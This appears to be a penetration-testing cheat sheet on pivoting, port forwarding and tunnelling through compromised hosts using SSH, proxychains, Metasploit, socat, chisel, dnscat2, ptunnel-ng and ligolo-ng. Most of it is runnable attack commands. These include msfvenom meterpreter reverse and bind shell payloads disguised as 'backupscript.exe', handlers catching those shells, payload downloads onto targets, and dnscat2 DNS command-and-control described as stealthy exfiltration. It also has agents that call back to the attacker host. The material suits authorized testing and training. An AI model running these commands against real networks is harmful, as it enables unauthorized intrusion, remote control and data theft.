↗️Pivoting, Port Forwarding and Tunnelling

Pivoting

During an engagement, we may find ourselves with all the credentials to move to another host, but there isn't a way to reach the host. Enter pivoting, we can use pivoting to create a connection to another host with a few different methods.

Pivot Host
Proxy
Foothold
Beach Head System
Jump Host

Pivot Networking Knowledge

We can check out the current network

Linux

ifconfig

Windows

ipconfig

Routing Tables

When looking for pivoting opportunities, it's a good idea to always check our current routing table

netstat -r

Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
default         192.168.88.2    0.0.0.0         UG        0 0          0 eth0
192.168.88.0    0.0.0.0         255.255.255.0   U         0 0          0 eth0   
10.129.1.x      10.10.11.1      255.255.254.0   U         0 0          0 tun0

If we are trying to connect to a target with the IP 10.129.1.x we can tell from the table where the packet would be sent. It would be forwarded to the Gateway matching the NIC (Interface).

Port Forwarding

A technique that allows us to redirect a communication request from one port to another.

SSH Local Port Forwarding

We can use SSH to enable port forwarding from a compromised target.

Scanning our target for open ports

nmap -sT -p22,3306 10.10.xx.x

In this case, let's say we wanted to use a closed port on the target 3306 we could port forward it to allow local access through port 2345.

Enabling Port Forwarding

ssh -L 2345:localhost:3306 user@10.10.xx.x

-L Instructs SSH client to request the SSH server to forward all the data we send via port 2345 to localhost:3306

Check Port Forward Worked

netstat -antp | grep 2345

nmap -sV -p2345 localhost -v

Forwarding Multiple Ports

ssh -L 2345:localhost:3306 -L 8080:localhost:80 user@10.10.xx.x

SSH Tunnelling

If we cannot perform a scan directly from our attack host then we will have to perform dynamic port forwarding. We do this by starting a SOCKS listener on our localhost and then setting up SSH to forward that traffic via SSH to the NAT network CIDR (172.16.5.0/23) we want to use. This technique can be used to bypass restrictions in firewalls.

Imagine we want to set up dynamic port forwarding for this setup

Enabling Dynamic Port Forwarding with SSH

ssh -D 9050 user@10.10.xx.x

-D Request the SSH server to use dynamic port forwarding

Setting up proxychains

Proxy chains can be used to redirect TCP connections through TOR, SOCKS and HTTP(S) proxy servers, and this allows us to chain multiple proxy servers together. It also allows us to hide our IP addresses as the receiving host will only see the IP of the pivot host.

We add socks4 127.0.0.1 9050 to the last line of the /etc/proxychains.conf file

Using Nmap with Proxychains

Now we can run Nmap to route all the packets to the local port 9050 where our SSH client is listening which will in turn forward all the packets over SSH to our 172.16.5.0/23 network.

This process is called SOCKS tunnelling

We can only perform a full TCP connect scan over proxy chains, as proxy chains cannot understand partial packets

proxychains nmap -v -sn 172.16.5.1-200

Windows scan through Proxychains

proxychains nmap -v -Pn -sT 172.16.5.19

Metasploit with Proxychains

We can run Metasploit through proxychains

proxychains msfconsole

Using xfreerdp with Proxychains

We can run an RDP session through proxychains

 proxychains xfreerdp /v:IP /u:user /p:passwd

Reverse Port Forwarding

When we need to forward a local service to a remote port. If we tried to gain a reverse shell on a network that doesn't have any connection to our attack host we would see it would fail.

We first have to find a pivot host which is the connection between us and the target.

In the above case, we start by creating a payload with msfvenom and using port 8080 on the pivot host to forward our reverse packets to our local port of 8000 where we will have a meterpreter handler listening.

Msfvenom Windows Payload

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

Start Metasploit and set the options for multi/handler and then run it

use exploit/muti/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 8000
run

Transfer Payload and Start a Server on Pivot Host

With our payload created, we copy it to the pivot host and then start a local server on the pivot host to host the file so we can download it from the target host

scp backupscript.exe ubuntu@<targetIP>:~/

python3 -m http.server 4444

Download Payload from Windows

 C:\Windows\system32> Invoke-WebRequest -Uri "http://windowsHost:4444/backupscript.exe" -OutFile "C:\backupscript.exe"

SSH Remote Port Forwarding

With the payload on our target machine, we can now use SSH RPF to forward connection from the Pivot host's 8080 port to our msfconsole listener on port 8000.

ssh -R <InteralIpOfPivotHostIP>:8080:0.0.0.0:8000 ubuntu@<TargetIP> -vN

-vN Sets verbose mode and stops login prompt
-R Allows the pivot host server to listen on targetIP:8080 and then forwards all incoming connections on port 8080 to our Metasploit listener on our attack host

If working correctly we should be able to execute the Windows payload we created earlier and if the payload is working as intended we should see the logs from the pivot on the pivot host and we should see our meterpreter shell has picked a connection from a successful pivot.

Meterpreter Tunneling

Meterpreter allows for pivot creation without relying on SSH port forwarding. We can follow the same steps from before

Create a Payload for Pivot Host

If we want to perform enumeration scans through the pivot host we can do so we with a Meterpreter session.

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=ATTACK-IP -f elf -o backupjob LPORT=8080

Start Multi/Handler

use exploit/multi/handler
...
<set options required>
...

run
[*] Started reverse TCP handler on 0.0.0.0:8080

We then copy the binary over to the pivot host with SSH and then execute it.

chmod +x backupjob
./backupjob

If done correctly we should have a meterpreter shell

Ping Sweeping

We can perform a ping sweep on the network using the ping_sweep module.

For example, we want to sweep the target that is connected to the pivot host (172.10.xx.x)

run post/multi/gather/ping_sweep 
set RHOSTS 172.10.xx.x/23

We can achieve this outside of meterpreter with one-liners

Ping Sweep For Loop on Linux Pivot Hosts

for i in {1..254} ;do (ping -c 1 172.10.xx.$i | grep "bytes from" &) ;done

Ping Sweep For Loop Using CMD

for /L %i in (1 1 254) do ping 172.10.xx.%i -n 1 -w 100 | find "Reply"

Ping Sweep Using PowerShell

1..254 | % {"172.10.xx.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}

Sometimes a sweep may not be successful so it's worth trying at least twice until the ARP cache gets built

The host may have a firewall blocking the pings (ICMP) and in this case,, we can either use Nmap or Metasploit's post module socks_proxy to configure a local proxy on our attack host.

Configuring MSF SOCKS Proxy

We make sure to set SOCKS version to 4a and set a listener on port 9050 in this case

use auxiliary/server/socks_proxy
...
set SRVPORT 9050
set SRVHOST 0.0.0.0
set version 4a
...

run
[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > options

---------
# Check to see if Proxy server is running
jobs

We now make sure our proxychain.conf file has been set correctly with the following line

socks4 127.0.0.1 9050

Creating AutoRoutes

We can route all the traffic to our Meterpreter session using autoroutes post/multi/manage/autoroute. This will allow Metasploit to add routes for the IP subnet and then route all our proxychains traffic through it.

use post/multi/manage/autoroute

set SESSION SESSION_ID
set SUBNET 172.16.5.0

run

[*] Running module against 10.129.202.64

We can also add routes directly from the Meterpreter session

run autoroute -s 172.10.xx/23

Lisiting Active AutoRoutes

run autoroute -p

Finally, we can test it worked with Nmap

proxychains nmap 172.16.5.x -p3389 -sT -v -Pn

Port Forwarding Meterpreter

We set our Meterpreter session to start a listener on attack hosts local port -l 3300, then we forward all packets to the remote host 172.16.5.x on port -p 3389 via Meterpreter.

portfwd add -l 3300 -p 3389 -r 172.16.5.x

Connecting to our Target with Localhost

As our target is Windows we can create an RDP session

xfreerdp /v:localhost:3300 /u:user /p:passwd

Meterpreter Reverse Port Forwarding

In the case that we want to listen on a specific port of the server and forward all incoming shells from the pivot host to our attack machine, we can perform reverse port forwarding.

To create a reverse port forward on our existing Meterpreter session we can use the portfwd command again.

 portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

-l 8081 Sets our local port to listen on
-p 1234 Forwards all connections on ports to our machine on the set local port

We can then create a reverse shell using the 172.16.x.x IP along with the port we set earlier

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.xx.x -f exe -o backupscript.exe LPORT=1234

We can now execute the payload on the target and we will receive a shell back from the target via the pivot

Socat Redirection w Reverse Shell

We can use Socat without the need for SSH tunnelling.

We want to start a Socat listener on the pivot host and then connect back to our attacking machine.

Start Listener

Socat will listen on localhost (Pivot host) port 8080 and forward all traffic to port 80 on our attack machine

socat TCP4-LISTEN:8080,fork TCP4:ATTACK-IP:80

We can use the same method of creating a payload for the target machine (Windows in this case), running the payload on the target and then starting a Metasploit listener on our machine to catch the connection.

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https

Socat Redirection w Bind Shell

With a bind shell, the target server will start a listener and bind to a particular port.

Creating a Payload for Target

Just like before we can use msfvenom to create a payload but this time note that we set the meterpreter shell to /bind_tcp

msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443

Start Socat Bind Listener

Start a listener that listens on port 8080 and forwards packets to 8443

socat TCP4-LISTEN:8080,fork TCP4:TARGET-IP:8443

Start Metasploit Handler

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
...

Make sure to always check payload type matches the type we input when creating the initial payload

SSH for Windows plink

Plink short for PuTTY Link is a Windows SSH tool that comes packaged with PuTTY.

Plink.exe

We can run it from the Command line to start a dynamic port forward, in this case, we use an Ubuntu server. This starts an SSH session between our Windows Attack host and the Ubuntu server.

plink -ssh -D 9050 ubuntu@ubuntu-IP

We could also use the tool Proxifier to achieve this too

Proxifier - The Most Advanced Proxy Clientwww.proxifier.com

SSH Pivoting w sshuttle

A tool written in Python which removes the need for proxychains. Sshuttle only works for pivoting over SSH and does not provide options for pivoting over other proxy servers (HTTPS or TOR)

A fantastic use of this tool is we don't need to use proxychains to connect to remote hosts.

Sshuttle

sudo apt-get install sshuttle
sudo sshuttle -r ubuntu@pivotIP targetIP/23 -v

-r Connection to the remote machine with a user and password
We make sure to pass the target IP we want to route through the pivot host

Running sshuttle will create an entry in our iptables to redirect all the traffic to the Target network through our pivot host

Testing Traffic

We can now run any tool without using proxychains, let's try Nmap

 nmap -v -sV -p3389 target-IP -A -Pn

Web Server Pivoting w Rpivot

Rpivot reverse SOCKS proxy tool used for SOCKS tunnelling. It binds a machine inside a corporate network to an external server and exposes the client's local port on the server side

Rpivot Installation

 sudo git clone https://github.com/klsecservices/rpivot.git
 sudo apt-get install python2.7

We start our rpivot SOCKS proxy server to allow the client to connect on port 9999 and listen on port 9050 for proxy pivot connections

Running sever.py from Attack Host

python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

Running client.py from Pivot Target

We can transfer rpivot to our pivot target like before with scp

scp -r rpivot ubuntu@IP:/home/ubuntu

 python2.7 client.py --server-ip Attack-IP --server-port 9999

We should see the connection confirming the pivot proxy was a success on our attack host (sever.py) . We now configure our proxychains file like before with the correct port 9050 and using proxy chains we should be able to access our target.

Browsing Target Webserver

proxychains firefox-esr Target-Webserver:80

If we run into a scenario where we cannot directly pivot to an external server we can provide an NTLM authentication option to our command to authenticate via the NTLM proxy.

python2.7 client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>

Port Forwarding in Windows w Netsh

Netsh is a Windows command line tool that can help with network configuration.

We can use it for

Finding routes
Viewing the firewall configuration
Adding proxies
Creating port forwarding rules

Port Forwarding w Netsh.exe

netsh.exe interface portproxy add v4tov4 listenport=9090 listenaddress=Pivot-IP connectport=3389 connectaddress=Target-IP

Checking Port Forward

netsh.exe interface portproxy show v4tov4

After setting up the port forward we can connect to the target in this case another Windows machine, through RDP through the listening port 8080 that we set up and choosing pivot hosts IP.

xfreerdp /v:Pivot-Host-IP:9090 /u:user /p:pass

DNS Tunneling

Dnscat2 is a tool used for tunnelling via the DNS protocol it can send data between two hosts. It uses an encrypted C2 (Command and Control) channel to send data inside TXT records within DNS.

When a local server tries to resolve an address, data is exfiltrated and sent over the network instead of a legitimate DNS request. Using dnscat2 for exfiltrating data is extremely stealthy, as it can evade firewall detection that strips HTTPS connections and sniffs traffic.

Dnscat2 Setup

 git clone https://github.com/iagox86/dnscat2.git
 cd dnscat2/server
 sudo gem install bundler
 sudo bundle install

Starting the Dnscat2 Server

sudo ruby dnscat2.rb --dns host=Host-IP,port=53,domain=domain.local --no-cache

Once the server is running it will provide us with the secret key which will can give to the dnscatclient2 client on the host so it can authenticate and encrypt the data that is sent to our external dnscat2 server.

Using dnscat2-powershell

For example, if take a Windows host we can use a client for dnscat2 or use the dnscat2-powershell.

We clone the project to our attack machine then transfer it to WIndows

git clone https://github.com/lukebaggett/dnscat2-powershell.git

Once on the Windows system, we can import it into PowerShell

PS C:\> Import-Module .\dnscat2.ps1

Now we can establish a tunnel with the server running on our attack machine

Start-Dnscat2 -DNSserver Attack-IP -Domain domain.local -PreSharedSecret dnscat2-secret-key -Exec cmd

Confirming Session and Usage

We should see the session is now established and we will be shown a dnscat2> prompt

dnscat2> ?

Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows

Interacting with the Session

dnscat2> window -i 1
New window created: 1
... 
...
Microsoft Windows [Version 10.0.18363.1801]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

SOCKS5 Tunneling

Chisel is a TCP/UDP-based tunnelling tool written in Go that uses HTTP to request data that is secured using SSH. It can create a client-server tunnel connection in a firewall-restricted environment.

Install and Setup

git clone https://github.com/jpillora/chisel.git
cd chisel
go build

Transfer to Host and Run

scp chisel ubuntu@IP:~/

Start the chisel server on the pivot host, it will listen for incoming connection on port 1234 using socks5

./chisel server -v -p 1234 --socks5

Connecting to the Chisel Server

./chisel client -v pivot-host-IP:1234 socks

Once created make sure to modify our proxychains.conf file to add the port 1080

# etc/proxychains.conf
socks5 127.0.0.1 1080

We should now be able to use proxychains like before to connect to the internal network

proxychains xfreerdp /v:internal-IP /u:user /p:password

ICMP Tunneling

ICMP tunneling encapsulates your traffic within ICMP packets which contain echo requests and responses. It will only work when ping responses are permitted within a firewalled network.

Ptunnel-ng

It allows us to create a tunnel between our Ubuntu server and the attack host, and once created we can proxy our traffic through the ptunnel-ng client

Install and Setup

git clone https://github.com/utoni/ptunnel-ng.git
cd ptunnel-ng
sudo ./autogen.sh

Start ptunnel-server on Target

Once installed we will have to transfer the folder to our target host, with the folder on our target we can start the server

sudo ./ptunnel-ng -rIP -R22

Connect to ptunnel-server on Host

We now need to connect the server we just created with -p Target-IP and through the port -l2222

sudo ./ptunnel-ng -pTarget-IP -l2222 -rTarget-IP -R22

Tunnel SSH connection through the ICMP tunnel

ssh -p2222 -lubuntu 127.0.0.1

Double Pivoting

If we find ourselves limited to a Windows network and can't use SSH as an option for pivoting then we can use SocksOverRDP.

First download then move these onto the Windows target

Loading SocksOverRDP.dll using regsvr32.exe

C:\Users\user\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll

Now we can connect to 172.16.5.19 over RDP and we should receive a prompt that the SocksOverRDP plugin is enabled

It will listen on 127.0.0.1:1080. We can use our credentials and connect to the IP.

We must transfer SocksOverRDPx64.zip or just the SocksOverRDP-Server.exe to the target IP. We can then start SocksOverRDP-Server.exe with Admin privileges.

When we return to our foothold target and check with Netstat, we should see our SOCKS listener started on 127.0.0.1:1080.

Confirming the SOCKS Listener is Started

netstat -antb | findstr 1080

TCP    127.0.0.1:1080         0.0.0.0:0              LISTENING

Once we have started our listener, we can transfer the Proxifier.exe to our target, and configure it to forward all our packets to 127.0.0.1:1080.

Proxifier will then route traffic through the given host and port.

Configuring Proxifier

Improving RDP Performance

RDP can become sluggish after opening multiple instances simultaneously. To fix this we can go to Experience -> Performance and make sure it's set to Modem

Ligolo-ng

GitHub - nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.GitHub

A tool that is very simple and fast to set up, it allows us to establish tunnels from a reverse RCP/TLS connection without the need for SOCKS or proxychain edits. It can be used on both Windows and Linux

We will start by downloading an agent and a proxy for our desired platform.

In this case, it will be a Linux pivot

Agent File

wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

Proxy File

wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

Create a tun Interface

Once downloaded and unpacked we need to create an tun interface on the Proxy server

sudo ip tuntap add user USERNAME mode tun ligolo
sudo ip link set ligolo up

Start Ligolo

./proxy -selfcert -laddr 0.0.0.0:PORT

Start Agent

With our Proxy Server started on our attacking machine we need to now move the agent to our target and then start it

./agent -connect ATTCK-IP:PORT -ignore-cert

If successful we should see a connection was established in our local instance of ligolo

ligolo-ng » INFO[0102] Agent joined. name=wolfy@nworkstation remote="XX.XX.XX.XX:38000"

Sessions

We can have many sessions at once and to move between them we use the following

ligolo-ng » session 
? Specify a session : 1 - wolfy@nworkstation - XX.XX.XX.XX:38000
? Specify a session : 2 - ?@nworkstation - XX.XX.XX.XX:10200

Display Network Configuration

Once connected we can run help in our ligolo session to see possible commands we can run, one of the most important is seeing the network configuration of the server. From the info gathered we now have a target network to pivot to

ifconfig

┌─────────────────────────────────────────────┐
│ Interface 1                                 │
├──────────────┬──────────────────────────────┤
│ Name         │ wlp3s0                       │
│ Hardware MAC │ de:ad:be:ef:ca:fe            │
│ MTU          │ 1500                         │
│ Flags        │ up|broadcast|multicast       │
│ IPv4 Address │ 172.168.0.10/23              │
└──────────────┴──────────────────────────────┘

Adding Subnet to Ligolo Routes

sudo ip route add 172.168.0.10/23 dev ligolo

Start Tunnel

This will start a tunnel for our selected session and will enable us access to the network and do further enumeration

ligolo-ng » start

Windows Pivot

Exactly the same steps as before for the local setup except this time will transfer and start a Windows agent on our target

First we need to download Wintun - git clone https://git.zx2c4.com/wintun

./agent.exe -connect Attack-IP:PORT -ignore-cert

PreviousCross-Forest Trust Abuse From Linux NextReverse Engineering

Last updated 1 year ago

Was this helpful?